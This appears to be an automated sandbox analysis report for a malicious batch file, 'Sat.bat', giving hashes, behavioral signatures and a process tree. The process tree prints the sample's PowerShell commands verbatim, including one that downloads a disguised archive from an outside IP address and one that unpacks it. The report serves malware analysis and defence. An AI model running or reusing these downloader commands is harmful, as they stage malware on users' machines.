Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-11-2024 02:15
Static task
static1
Behavioral task
behavioral1
Sample
Sat.bat
Resource
win7-20240903-en
General
-
Target
Sat.bat
-
Size
2KB
-
MD5
0e2fff554ddadc58aaff7978ec06aa32
-
SHA1
b453b17905235ea96150c90711285f7879d3afc0
-
SHA256
64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
-
SHA512
c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76
Malware Config
Extracted
http://109.199.101.109:770/xx.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2920 powershell.exe -
pid Process 2920 powershell.exe 2608 powershell.exe 2844 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2204 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2920 powershell.exe 2608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2844 2708 cmd.exe 32 PID 2708 wrote to memory of 2844 2708 cmd.exe 32 PID 2708 wrote to memory of 2844 2708 cmd.exe 32 PID 2844 wrote to memory of 2116 2844 powershell.exe 33 PID 2844 wrote to memory of 2116 2844 powershell.exe 33 PID 2844 wrote to memory of 2116 2844 powershell.exe 33 PID 2116 wrote to memory of 2920 2116 cmd.exe 35 PID 2116 wrote to memory of 2920 2116 cmd.exe 35 PID 2116 wrote to memory of 2920 2116 cmd.exe 35 PID 2116 wrote to memory of 2608 2116 cmd.exe 36 PID 2116 wrote to memory of 2608 2116 cmd.exe 36 PID 2116 wrote to memory of 2608 2116 cmd.exe 36 PID 2116 wrote to memory of 2204 2116 cmd.exe 37 PID 2116 wrote to memory of 2204 2116 cmd.exe 37 PID 2116 wrote to memory of 2204 2116 cmd.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "3⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak4⤵
- Delays execution with timeout.exe
PID:2204
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ed23dc11d2d7bcdd2d9b9d88a6e0b3dd
SHA17a7f76c3de94bb3679967fc969377d24b09a611f
SHA256a0f91f0c6416525d3c19f23d68b2c1df64931e5f1ee73de7fe55d3124fa4d496
SHA512e8adc4a08d8450ddb0d5c4c080a145503db0e85f66df723631b5197202448b4e1410c826b1a386263fd7d047152db4d6dd8d369331f5058aee62bea5736daa55